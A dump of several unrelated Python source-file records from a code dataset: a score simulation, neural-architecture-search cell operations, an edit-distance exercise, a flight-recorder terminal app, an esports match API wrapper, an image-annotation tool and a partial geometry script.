')\n return render(request,'gy/thanks.html')\n\n\n\n\n\n\n\n","sub_path":"other/gy/j/gy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"439143907","text":"import random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nteamscore=[]\r\nfor i in range(100000):\r\n##player1\r\n p1mu=10\r\n p1sig=3\r\n p1score=random.gauss(p1mu,p1sig)\r\n##player2\r\n p2mu=10\r\n p2sig=3\r\n p2score=random.gauss(p2mu,p2sig)\r\n##player3\r\n p3mu=10\r\n p3sig=3\r\n p3score=random.gauss(p3mu,p3sig)\r\n##player4\r\n p4mu=10\r\n p4sig=3\r\n p4score=random.gauss(p4mu,p4sig)\r\n##player5\r\n p5mu=10\r\n p5sig=3\r\n p5score=random.gauss(p5mu,p5sig)\r\n##player6\r\n p6mu=10\r\n p6sig=3\r\n p6score=random.gauss(p6mu,p6sig)\r\n##player7\r\n p7mu=10\r\n p7sig=3\r\n p7score=random.gauss(p7mu,p7sig)\r\n##player8\r\n p8mu=10\r\n p8sig=3\r\n p8score=random.gauss(p8mu,p8sig)\r\n##player9\r\n p9mu=10\r\n p9sig=3\r\n p9score=random.gauss(p9mu,p9sig)\r\n##player10\r\n p10mu=10\r\n p10sig=3\r\n p10score=random.gauss(p10mu,p10sig)\r\n##player11\r\n p11mu=10\r\n p11sig=3\r\n p11score=random.gauss(p11mu,p11sig)\r\n\r\n teamscore.append(p1score+p2score+p3score+p4score+p5score+p6score+p7score+p8score+p9score+p10score+p11score)\r\n\r\nteamscorenp = np.array(teamscore)\r\nplt.hist(teamscorenp, normed ='True')\r\nplt.show()\r\n##for i in teamscore:\r\n\r\nprint(teamscorenp.mean())\r\nprint(teamscorenp.std())\r\n\r\n","sub_path":"simulation_letstry.py","file_name":"simulation_letstry.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"150942849","text":"##################################################\n# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019 #\n##################################################\nimport torch\nimport torch.nn as nn\n\nfrom .cell_operations import ResNetBasicblock, Zero, Identity\nfrom .norm_modules import SandwichBatchNorm2d\n\n__all__ = [\"OPS\", \"ResNetBasicblock\"]\n\nOPS = {\n \"none\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: Zero(\n C_in, C_out, stride\n ),\n \"avg_pool_3x3\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: POOLING(\n C_in,\n C_out,\n stride,\n \"avg\",\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n \"nor_conv_3x3\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: ReLUConvBN(\n C_in,\n C_out,\n (3, 3),\n (stride, stride),\n (1, 1),\n (1, 1),\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n \"nor_conv_1x1\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: ReLUConvBN(\n C_in,\n C_out,\n (1, 1),\n (stride, stride),\n (0, 0),\n (1, 1),\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n \"skip_connect\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: Identity()\n if stride == 1 and C_in == C_out\n else FactorizedReduce(\n C_in,\n C_out,\n stride,\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n}\n\n\nclass ReLUConvBN(nn.Module):\n def __init__(\n self,\n C_in,\n C_out,\n kernel_size,\n stride,\n padding,\n dilation,\n affine,\n track_running_stats=True,\n num_prev_ops=1,\n num_prev_nodes=1,\n is_node_zero=False,\n ):\n super(ReLUConvBN, self).__init__()\n self.op = nn.Sequential(\n nn.ReLU(inplace=False),\n nn.Conv2d(\n C_in,\n C_out,\n kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n bias=False,\n ),\n )\n self.bn = SandwichBatchNorm2d(\n C_out,\n affine=affine,\n track_running_stats=track_running_stats,\n num_prev_ops=num_prev_ops,\n num_prev_nodes=num_prev_nodes,\n is_node_zero=is_node_zero,\n )\n\n def forward(self, x, prev_op_idx=[0], first_layer=False):\n x = self.op(x)\n output = self.bn(x, prev_op_idx, first_layer)\n return output\n\n\nclass POOLING(nn.Module):\n def __init__(\n self,\n C_in,\n C_out,\n stride,\n mode,\n affine=True,\n track_running_stats=True,\n num_prev_ops=1,\n num_prev_nodes=1,\n is_node_zero=False,\n ):\n super(POOLING, self).__init__()\n if C_in == C_out:\n self.preprocess = None\n else:\n self.preprocess = ReLUConvBN(\n C_in,\n C_out,\n 1,\n 1,\n 0,\n 1,\n affine,\n track_running_stats,\n num_prev_ops=num_prev_ops,\n num_prev_nodes=num_prev_nodes,\n is_node_zero=is_node_zero,\n )\n if mode == \"avg\":\n self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)\n elif mode == \"max\":\n self.op = nn.MaxPool2d(3, stride=stride, padding=1)\n else:\n raise ValueError(\"Invalid mode={:} in POOLING\".format(mode))\n\n def forward(self, inputs, prev_op_idx=[0], first_layer=False):\n if self.preprocess:\n x = self.preprocess(inputs, prev_op_idx, first_layer)\n else:\n x = inputs\n return self.op(x)\n\n\nclass FactorizedReduce(nn.Module):\n def __init__(\n self,\n C_in,\n C_out,\n stride,\n affine,\n track_running_stats,\n num_prev_ops=1,\n num_prev_nodes=1,\n is_node_zero=False,\n ):\n super(FactorizedReduce, self).__init__()\n self.stride = stride\n self.C_in = C_in\n self.C_out = C_out\n self.relu = nn.ReLU(inplace=False)\n if stride == 2:\n C_outs = [C_out // 2, C_out - C_out // 2]\n self.convs = nn.ModuleList()\n for i in range(2):\n self.convs.append(\n nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False)\n )\n self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)\n else:\n raise ValueError(\"Invalid stride : {:}\".format(stride))\n self.bn = SandwichBatchNorm2d(\n C_out,\n affine=affine,\n track_running_stats=track_running_stats,\n num_prev_ops=num_prev_ops,\n num_prev_nodes=num_prev_nodes,\n is_node_zero=is_node_zero,\n )\n\n def forward(self, x, prev_op_idx=[0], first_layer=False):\n x = self.relu(x)\n y = self.pad(x)\n out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)\n out = self.bn(out, prev_op_idx, first_layer)\n return out\n\n def extra_repr(self):\n return \"C_in={C_in}, C_out={C_out}, stride={stride}\".format(**self.__dict__)\n","sub_path":"NAS/lib/models/cell_operations_sabn.py","file_name":"cell_operations_sabn.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425853874","text":"'''\r\nProject: Edit Distance (Dynamic Programming)\r\nName: Jonathan Argumedo\r\nClass: Data Structures 2302\r\nInstructor: Diego Aguirre\r\nTA: Anindita Nath\r\nDate: December 9, 2018\r\nUpdate by: (Your name goes here)\r\n'''\r\n\r\n#imports\r\nimport time\r\n\r\n\r\n'''\r\n'editDistance' method simply finds the differences in two \r\nwords that are passed as parameters. A better explination can be\r\nfound online. \r\n'''\r\ndef editDistance(string, string2, lengthStr, lengthStr2):\r\n \r\n # If first string is empty \r\n # insert all characters of second string into first \r\n if lengthStr == 0:\r\n return lengthStr2\r\n \r\n # If second string is empty \r\n # insert all characters of first string into first \r\n if lengthStr2 == 0:\r\n return lengthStr\r\n \r\n # If last characters of two strings are same\r\n # Ignore last characters and get count for \r\n # remaining strings. \r\n if string[lengthStr - 1] == string2[lengthStr2 -1]:\r\n return editDistance(string, string2, lengthStr -1, lengthStr2 -1)\r\n\r\n #do all possible cases\r\n return 1 + min(\r\n #Insert\r\n editDistance(string, string2, lengthStr , lengthStr2 - 1),\r\n #delete\r\n editDistance(string, string2, lengthStr - 1, lengthStr2),\r\n #replace\r\n editDistance(string, string2, lengthStr - 1, lengthStr2 - 1) )\r\n\r\n'''\r\n'compute' method takes two strings as parameters and it computes the \r\nleast difference between each word (Edit Distance)\r\n'''\r\ndef compute(string, string2):\r\n print ('-' *20 + \"EDIT DISTANCE\" + '-' *20)\r\n print(\"Words:\\t1) %s\\n\\t2) %s\" %(string, string2))\r\n print(\"\\n\\nThe Edit Distance is: %d\" % editDistance(string, string2, len(string), len(string2)))\r\n print ('-' * 53)\r\n\r\n\r\ndef main():\r\n #You could simply compy past the code from 'compute' method\r\n #and paste it in this method. Now your code\r\n #will be able to ask the user for 2 words\r\n '''\r\n print('-' *20 + \"INPUT WORDS\" + '-' *20)\r\n string = input(\"Enter the first word: \")\r\n string2 = input(\"Enter the second word: \")\r\n print('-' *51 + \"\\n\\n\")\r\n '''\r\n \r\n #LAB 7 (class scenerio)\r\n #I could of used one file to do comperasions\r\n #Just felt this would be better for testing\r\n try:\r\n name_file = input(\"Enter the name of the first file (include file extension): \")\r\n name_file2 = input(\"Enter the name of the second file (include file extension): \")\r\n file = open(name_file, \"r\")\r\n \r\n #compare each word in the first file with all the \r\n #other words in the second file\r\n \r\n #check how long it takes to execute\r\n #for testing purposes only\r\n #(small files, small1 file) (big file, big1 file) etc\r\n start_time = time.time()\r\n \r\n for word in file:\r\n file2 = open(name_file2, \"r\")\r\n for compared in file2:\r\n compute(word, compared)\r\n \r\n print(\"\\n\\nIt took [%.5f] to find the distance for every possible word\" %(time.time() - start_time))\r\n except FileNotFoundError:\r\n print(\"\\n\\nOops! File not found\\nCheck the name and try again\")\r\nmain()","sub_path":"editDistance.py","file_name":"editDistance.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552390716","text":"from flightrecorder.db.dbdatabase import FlightRecorderDatabase\nfrom flightrecorder.dataexchange.dxcsv import import_csv, export_csv\nfrom flightrecorder.config.configuration import Configuration\nfrom flightrecorder.forms.frconstants import *\nfrom flightrecorder.forms.frmain import MainForm\nfrom flightrecorder.forms.frflightdetails import FlightDetailsForm\nfrom flightrecorder.forms.fraircraftregistration import AircraftRegistrationForm\nfrom flightrecorder.forms.fraircraftdetails import AircraftDetailsForm\nfrom flightrecorder.forms.frsightings import SightingForm\nfrom flightrecorder.forms.frconfirm import ConfirmForm\nfrom flightrecorder.forms.frdataexchange import ImportForm, ExportForm\nfrom flightrecorder.forms.frquery import QueryByFlight, QueryByAircraft, QueryByAirline, QueryByRoute, QueryShowSighting\nfrom flightrecorder.forms.frsetdblocation import SelectDatabaseLocationForm\nimport npyscreen as np\nimport datetime as datetime\nimport os\n\n\nclass FlightRecorderApp(np.NPSAppManaged):\n def onStart(self):\n self._config = Configuration()\n\n try:\n os.remove(self._config.log_file_name())\n except:\n pass\n\n # Configure properties\n self._control_callback_handler = None\n self._db = None\n self._properties = {KEY_FLIGHT_NUMBER: None,\n KEY_EMBARKATION: None,\n KEY_DESTINATION: None,\n KEY_AIRLINE: None,\n KEY_REGISTRATION: None,\n KEY_SERIAL_NUMBER: None,\n KEY_MANUFACTURER: None,\n KEY_MODEL: None,\n KEY_MANUFACTURED: None,\n KEY_AGE: None,\n KEY_ALTITUDE: None,\n KEY_LOCATION: None,\n KEY_DATE: None}\n\n # Attempt to open the database\n self.open_database()\n\n # Configure forms\n title = \"Flight Recorder V{}\".format(self._config.app_version())\n self.addForm(FRM_MAIN, MainForm, name=title)\n self.addForm(FRM_SET_DATABASE_LOCATION, SelectDatabaseLocationForm, name=title)\n self.addForm(FRM_FLIGHT_DETAILS, FlightDetailsForm, name=\"Flight Details\")\n self.addForm(FRM_AIRCRAFT_REGISTRATION, AircraftRegistrationForm, name=\"Aircraft Registration Number\")\n self.addForm(FRM_AIRCRAFT_DETAILS, AircraftDetailsForm, name=\"Aircraft Details\")\n self.addForm(FRM_SIGHTING_DETAILS, SightingForm, name=\"Aircraft Sighting Details\")\n self.addForm(FRM_CONFIRM_FORM, ConfirmForm, name=\"Confirm Details\")\n self.addForm(FRM_IMPORT, ImportForm, name=\"Import Data\")\n self.addForm(FRM_EXPORT, ExportForm, name=\"Export Data\")\n self.addForm(FRM_QUERY_BY_FLIGHT, QueryByFlight, name=\"Query Sightings by Flight Number\")\n self.addForm(FRM_QUERY_BY_AIRCRAFT, QueryByAircraft, name=\"Query Sightings by Aircraft\")\n self.addForm(FRM_QUERY_BY_AIRLINE, QueryByAirline, name=\"Query Sightings by Airline\")\n self.addForm(FRM_QUERY_BY_ROUTE, QueryByRoute, name=\"Query Sightings by Route\")\n self.addForm(FRM_QUERY_SHOW_SIGHTING, QueryShowSighting, name=\"Selected Sighting\")\n\n def log_debug(self, message):\n date = datetime.datetime.now().strftime(\"%d/%m/%Y, %H:%M:%S\")\n f = open(self._config.log_file_name(), mode=\"at\", encoding=\"UTF-8\")\n f.write(\"{} : {}\\n\".format(date, message))\n f.close()\n\n def log_properties(self):\n for property_name, value in self._properties.items():\n if value is None:\n log_value = \"None\"\n else:\n log_value = value\n self.log_debug(\"{} = {}\".format(property_name, log_value))\n\n def open_database(self):\n if self._config.database_name() is not None:\n self._db = FlightRecorderDatabase()\n else:\n self._db = None\n\n def set_database_location(self, location):\n self._config.set_database_location(location)\n self.open_database()\n\n def set_property(self, property_name, value):\n new_value = {property_name: value}\n self._properties.update(new_value)\n\n def get_property(self, property_name):\n return self._properties[property_name]\n\n def set_control_callback_handler(self, handler):\n self._control_callback_handler = handler\n\n def handle_control_callback(self, control, value):\n if self._control_callback_handler is not None:\n self._control_callback_handler(control, value)\n\n def database(self):\n return self._db\n\n def flight_exists(self, number):\n return self._db.flight_repo().exists(number)\n\n def load_existing_airlines(self):\n airlines = self._db.airline_repo().read_all()\n return [airline.name() for airline in airlines]\n\n def aircraft_exists(self, registration):\n return self._db.aircraft_repo().exists(registration)\n\n def load_existing_aircraft(self):\n aircraft = self._db.aircraft_repo().read(\"registration\", self.get_property(KEY_REGISTRATION))\n self.set_property(KEY_SERIAL_NUMBER, aircraft.serial_number())\n self.set_property(KEY_MANUFACTURER, aircraft.model().manufacturer().name())\n self.set_property(KEY_MODEL, aircraft.model().name())\n self.set_property(KEY_MANUFACTURED, aircraft.manufactured())\n self.set_property(KEY_AGE, aircraft.age())\n\n def load_existing_manufacturers(self):\n manufacturers = self._db.manufacturer_repo().read_all()\n return [manufacturer.name() for manufacturer in manufacturers]\n\n def load_models_for_manufacturer(self, manufacturer):\n models = self._db.model_repo().read_all_for_manufacturer(manufacturer)\n return [model.name() for model in models]\n\n def load_existing_locations(self):\n locations = self._db.location_repo().read_all()\n return [location.name() for location in locations]\n\n def load_matching_flights(self, flight_number):\n flights = self._db.flight_repo().read_all(\"number\", flight_number, \"id\")\n return [(flight.embarkation(), flight.destination(), flight.airline().name()) for flight in flights]\n\n def load_sighting(self, sighting):\n self.set_property(KEY_FLIGHT_NUMBER, sighting.flight().number())\n self.set_property(KEY_EMBARKATION, sighting.flight().embarkation())\n self.set_property(KEY_DESTINATION, sighting.flight().destination())\n self.set_property(KEY_AIRLINE, sighting.flight().airline().name())\n self.set_property(KEY_REGISTRATION, sighting.aircraft().registration())\n self.set_property(KEY_SERIAL_NUMBER, sighting.aircraft().serial_number())\n self.set_property(KEY_MANUFACTURER, sighting.aircraft().model().manufacturer().name())\n self.set_property(KEY_MODEL, sighting.aircraft().model().name())\n self.set_property(KEY_MANUFACTURED, sighting.aircraft().manufactured())\n self.set_property(KEY_AGE, sighting.aircraft().age())\n self.set_property(KEY_ALTITUDE, sighting.altitude())\n self.set_property(KEY_LOCATION, sighting.location().name())\n self.set_property(KEY_DATE, sighting.date())\n\n def create_record(self):\n aircraft_id = self._db.create_aircraft(self.get_property(KEY_REGISTRATION),\n self.get_property(KEY_SERIAL_NUMBER),\n self.get_property(KEY_MANUFACTURED),\n self.get_property(KEY_MODEL),\n self.get_property(KEY_MANUFACTURER)).db_id()\n\n flight_id = self._db.create_flight(self.get_property(KEY_FLIGHT_NUMBER),\n self.get_property(KEY_EMBARKATION),\n self.get_property(KEY_DESTINATION),\n self.get_property(KEY_AIRLINE)).db_id()\n\n location_id = self._db.create_location(self.get_property(KEY_LOCATION)).db_id()\n\n self._db.create_sighting(self.get_property(KEY_ALTITUDE),\n self.get_property(KEY_DATE),\n location_id,\n flight_id,\n aircraft_id)\n\n def import_data(self, filename, progress_callback):\n import_csv(filename, progress_callback, self._db)\n\n def export_data(self, filename, progress_callback):\n export_csv(filename, progress_callback, self._db)\n","sub_path":"src/flightrecorder/forms/frapplication.py","file_name":"frapplication.py","file_ext":"py","file_size_in_byte":8584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"474046699","text":"import requests\nimport json\nfrom datetime import datetime\nimport main_page.data_modules.functions\nimport main_page.data_modules.user\nimport main_page.data_modules.team\n\n\nclass Match:\n def __init__(self, match_id):\n self.base_url = 'http://api.eslgaming.com/play/v1/'\n self.match_id = str(match_id)\n\n def get_match_info(self):\n \"\"\"Returns all match info.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n match_name = 'Match link'\n match_link = ' {1} '.format(self.match_id, match_name)\n response['Link'] = match_link\n\n del response['contestants']\n del response['maps']\n del response['gameaccounts']\n del response['parameters']\n\n return response\n\n def get_match_mode(self):\n \"\"\"Returns match mode ('1on1', '5on5', etc.).\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n return response['type']\n\n def get_contestants_profile(self):\n \"\"\"Returns 2 teams profiles.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n test_match = Match(self.match_id)\n contestants_profiles = []\n if test_match.get_match_info() == \"error\":\n return \"error\"\n else:\n for key, value in test_match.get_match_info().items():\n if key == \"contestants\":\n contestants = value\n for i in range(len(contestants)):\n if Match.get_match_mode(self) == \"1on1\":\n if contestants[i]['user']['id'] == None:\n contestants_profiles.append({'User': 'Deleted player account'})\n else:\n contestant = main_page.data_modules.user.User(contestants[i]['user']['id'])\n contestants_profiles.append(contestant.get_profile())\n else:\n if contestants[i]['team']['id'] == None:\n contestants_profiles.append({'Team': 'Deleted team account'})\n else:\n contestant = main_page.data_modules.team.Team(contestants[i]['team']['id'])\n contestants_profiles.append(contestant.get_team_info())\n return contestants_profiles\n\n def get_contestants_members_info(self):\n \"\"\"Returns useful info of players, participating in that match.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n test_match = Match(self.match_id)\n members_info = []\n players_id = []\n i = 0\n for key, value in test_match.get_match_info().items():\n if key == \"gameaccounts\":\n players = value\n for key_player, value_player in players.items():\n new_member = main_page.data_modules.user.User(key_player)\n members_info.append(new_member.get_useful_info())\n return members_info\n\n def get_match_date_time(self):\n \"\"\"Returns Match Date and its Duration.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n status = response['status']\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n if status == \"closed\":\n start_date_string = response['beginAt']\n end_date_string = response['calculatedAt']\n\n start_date = start_date_string[:10]\n start_time = start_date_string[11:19]\n start = start_date + ' ' + start_time\n beginning_date = datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\") # !!!\n\n end_date = end_date_string[:10]\n end_time = end_date_string[11:19]\n end = end_date + ' ' + end_time\n final_date = datetime.strptime(end, \"%Y-%m-%d %H:%M:%S\") # !!!\n\n delta = final_date - beginning_date\n match_name = 'Match link'\n match_link = ' {1} '.format(self.match_id,\n match_name)\n match_time = {\"Start time\": start, \"End time\": end, \"Duration of the match\": delta, 'Link': match_link}\n return match_time\n else:\n return \"open\"\n\n def get_match_results(self):\n \"\"\"Returns match status and result, if it is closed.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n test_match = Match(self.match_id)\n result_argument = response['result']['score']\n results = result_argument\n\n teams = list(results.keys())\n scores = list(results.values())\n winners = teams[0]\n losers = teams[1]\n\n match_name = 'Match link'\n match_link = ' {1} '.format(self.match_id, match_name)\n\n result = \"\"\n for i in range(2):\n if scores[0] > scores[1]:\n winners = teams[0]\n losers = teams[1]\n elif scores[1] > scores[0]:\n winners = teams[1]\n losers = teams[0]\n else:\n result = \"draw\"\n\n if Match.get_match_mode(self) == \"1on1\":\n user_win = main_page.data_modules.user.User(winners)\n user_lose = main_page.data_modules.user.User(losers)\n user_win_id = \"\"\n user_win_name = \"\"\n user_lose_id = \"\"\n user_lose_name = \"\"\n if \"error\" in user_win.get_profile() and \"error\" in user_lose.get_profile():\n user_win_name = \"'\" + \"Deleted account\" + \"'\"\n user_win_id = \"id: \" + winners\n user_win_link = \"ERROR - DELETED ACCOUNT\"\n user_lose_name = \"'\" + \"Deleted account\" + \"'\"\n user_lose_id = \"id: \" + losers\n user_lose_link = \"ERROR - DELETED ACCOUNT\"\n if \"error\" in user_win.get_profile() and not (\"error\" in user_lose.get_profile()):\n user_win_id = \"id: \" + winners\n user_win_name = \"'\" + \"Deleted account\" + \"'\"\n user_win_link = \"ERROR - DELETED ACCOUNT\"\n user_lose_id = \"id: \" + losers\n user_lose_name = user_lose.get_profile()['nickname']\n user_lose_link = ' {1} '.format(losers,\n user_lose_name)\n if \"error\" in user_lose.get_profile() and not (\"error\" in user_win.get_profile()):\n user_lose_id = \"id: \" + losers\n user_lose_name = \"'\" + \"Deleted account\" + \"'\"\n user_lose_link = \"ERROR - DELETED ACCOUNT\"\n user_win_id = \"id: \" + winners\n user_win_name = user_win.get_profile()['nickname']\n user_win_link = ' {1} '.format(winners,\n user_win_name)\n elif not (\"error\" in user_lose.get_profile()) and not (\"error\" in user_win.get_profile()):\n user_win_id = \"id: \" + winners\n user_win_name = user_win.get_profile()['nickname']\n user_win_link = ' {1} '.format(winners,\n user_win_name)\n user_lose_id = \"id: \" + losers\n user_lose_name = user_lose.get_profile()['nickname']\n user_lose_link = ' {1} '.format(losers,\n user_lose_name)\n if result != \"draw\":\n dict = {user_win_link: 'has won!', user_lose_link: 'has lost.', 'Link': match_link}\n return dict\n else:\n dict = {'Result': 'There result is draw', user_win_link: user_win_id, user_lose_link: user_lose_id,\n 'Link': match_link}\n return dict\n else:\n team_win = main_page.data_modules.team.Team(winners)\n team_lose = main_page.data_modules.team.Team(losers)\n team_win_id = \"\"\n team_win_name = \"\"\n team_lose_id = \"\"\n team_lose_name = \"\"\n if \"error\" in team_lose.get_team_info() and \"error\" in team_win.get_team_info():\n team_win_id = \"0 - Deleted Account\"\n team_win_name = \"Deleted Account - 1\"\n team_win_link = \"ERROR - DELETED ACCOUNT\"\n team_lose_id = \"0 - Deleted Account\"\n team_lose_name = \"Deleted Account - 2\"\n team_lose_link = \"ERROR - DELETED ACCOUNT\"\n if \"error\" in team_win.get_team_info() and not (\"error\" in team_lose.get_team_info()):\n team_win_id = \"id: \" + winners\n team_win_name = \"'\" + \"Deleted account\" + \"'\"\n team_win_link = \"ERROR - DELETED ACCOUNT\"\n team_lose_id = \"id: \" + losers\n team_lose_name = team_lose.get_team_info()['name']\n team_lose_link = ' {1} '.format(losers,\n team_lose_name)\n if \"error\" in team_lose.get_team_info() and not (\"error\" in team_win.get_team_info()):\n team_lose_id = \"id: \" + losers\n team_lose_name = \"'\" + \"Deleted account\" + \"'\"\n team_lose_link = \"ERROR - DELETED ACCOUNT\"\n team_win_id = \"id: \" + winners\n team_win_name = team_win.get_team_info()['name']\n team_win_link = ' {1} '.format(winners,\n team_win_name)\n elif not (\"error\" in team_win.get_team_info()) and not (\"error\" in team_lose.get_team_info()):\n team_win_id = \"id: \" + winners\n team_win_name = team_win.get_team_info()['name']\n team_win_link = ' {1} '.format(winners,\n team_win_name)\n team_lose_id = \"id: \" + losers\n team_lose_name = team_lose.get_team_info()['name']\n team_lose_link = ' {1} '.format(losers,\n team_lose_name)\n if result != \"draw\":\n dict = {team_win_link: 'has won!', team_lose_link: 'has lost.', 'Link': match_link}\n return dict\n else:\n dict = {'Result': 'There result is draw', team_win_link: team_win_id, team_lose_link: team_lose_id,\n 'Link': match_link}\n return dict\n\n def get_match_media(self):\n \"\"\"Returns match media, if any.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id + \"/media\")\n response = json.loads(r.text)\n new_r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n new_response = json.loads(new_r.text)\n status = new_response['status']\n files = []\n if status == \"closed\":\n for i in range(len(response)):\n files.append(response[i]['filename'])\n if len(files) == 0:\n return \"nothing\"\n else:\n return files\n elif status == \"open\":\n return \"Open\" # Match is not closed yet\n\n def get_match_status(self):\n \"\"\"Returns current match status.\"\"\"\n r = requests.get(self.base_url + \"/matches/\" + self.match_id)\n response = json.loads(r.text)\n if main_page.data_modules.functions.Functions.is_error(response):\n return \"error\"\n else:\n status = response['status']\n return status\n","sub_path":"Code/main_page/data_modules/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":13818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163406715","text":"import cv2\nimport glob\nimport math\nimport numpy as np\n \ndef sort_func(image_name):\n video_name = int.from_bytes(image_name.split('/')[-2].encode(), 'little')\n num = int(image_name.split('/')[-1].split('.')[-2])\n return video_name + num\nimage_name_list1 = glob.glob('../data/train/1/*/*.jpg')\nimage_name_list1.sort(key = sort_func)\nimage_name_list2 = glob.glob('../data/train/2/*/*.jpg')\nimage_name_list2.sort(key = sort_func)\nimage_name_list0 = glob.glob('../data/train/0/*/*.jpg')\nimage_name_list0.sort(key = sort_func)\nimage_name_list = image_name_list1 + image_name_list2 + image_name_list0\n\ncv2.namedWindow('image',cv2.WINDOW_NORMAL)\ncv2.setWindowProperty(\"image\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\nimage = cv2.imread(image_name_list[0])\nimage_size = image.shape\nr = 125\n\nmouse_x = 0\nmouse_y = 0\npoint_a = (0, 0)\npoint_b = (0, 0)\n\ndef mouse_callback(event, x, y, flag, param):\n global mouse_x, mouse_y, point_a, point_b\n mouse_x = x\n mouse_y = y\n point_a = (max(x - r, 0), max(y - r, 0))\n point_b = (min(x + r, image_size[1]), min(y + r, image_size[0]))\n\ncv2.setMouseCallback('image', mouse_callback)\ni = 0 \n\n#data = np.zeros((len(image_name_list), 4), dtype ='int')\n#np.save(\"../data/mark.npy\", data)\ndata = np.load(\"../data/mark.npy\")\n\nwhile(1):\n i = i % len(image_name_list)\n image_name = image_name_list[i]\n image = cv2.imread(image_name)\n if data[i].sum() != 0:\n p_a = (data[i][0], data[i][1])\n p_b = (data[i][2], data[i][3])\n image = cv2.rectangle(image, p_a, p_b, [237, 128, 255] , 5)\n image = cv2.rectangle(image, point_a, point_b, [128, 128, 0] , 5)\n cv2.imshow('image',image)\n key = cv2.waitKey(2)\n if key == ord('q'):\n break\n if key == ord('s'):\n np.save(\"../data/mark.npy\", data)\n np.save('../data/image_name_list.npy',np.array(image_name_list))\n continue\n if key == ord('2'):\n data[i][0] = point_a[0]\n data[i][1] = point_a[1]\n data[i][2] = point_b[0]\n data[i][3] = point_b[1]\n i += 1\n continue\n if key == ord('1'):\n i = i - 1\n continue\n if key == ord('3'):\n i = i + 1\n continue\n if key == ord('7'):\n i = i - 100\n continue\n if key == ord('9'):\n i = i + 100\n if key == ord('3'):\n i = i + 10\n continue\n if key == ord('4'):\n i = i - 10\n if key == ord('6'):\n i = i + 10\n continue\n\n","sub_path":"mark.py","file_name":"mark.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60590428","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\ndef dajSuradniceStreduAPolomer(x1,y1,x2,y2,alpha):#vychadza z 2 bodov a smernice v 1 z nich \n #priamka a - normala na spojnicu bodov [x1,y1] a [x2,y2]\n ka = np.tan(np.pi/2.0+np.arctan(float(y1-y2)/float(x1-x2)))#smernica priamky a\n qa = 0.5*(y1+y2-np.tan(np.pi/2.0+np.arctan(float(y1-y2)/float(x1-x2)))*float(x1+x2))\n #priamka c - normala na smer natocenia robota\n kc = np.tan(np.pi/2.0+alpha)#smernica priamky c\n qc = y1+np.tan(np.pi/2.0+alpha)*x1\n #suradnice stredu kruznice prienik priamky a a c\n sx = float(qa-qc)/float(kc-ka)#x-ova suradnica stredu kruznice\n sy = float(kc*sx+qc)#y-ova suradnica stredu kruznice\n R = np.sqrt((x1-sx)**2+(y1-sy)**2)#polomer danej kruznice\n omega = 2*np.arcsin(np.sqrt((x1-x2)**2+(y1-y2)**2)/(2.*R))#uhol v radianoch o aky sa zatoci okolo bodu Sx Sy\n omegaDeg = omega*180./np.pi#uhol v stupnoch\n return sx,sy,R,omegaDeg,omega\nA = (0,0)\nB = (80,120)\nS = dajSuradniceStreduAPolomer(A[0],A[1],B[0],B[1],0)\nfig, ax = plt.subplots()\nos=180\nplt.subplots_adjust( 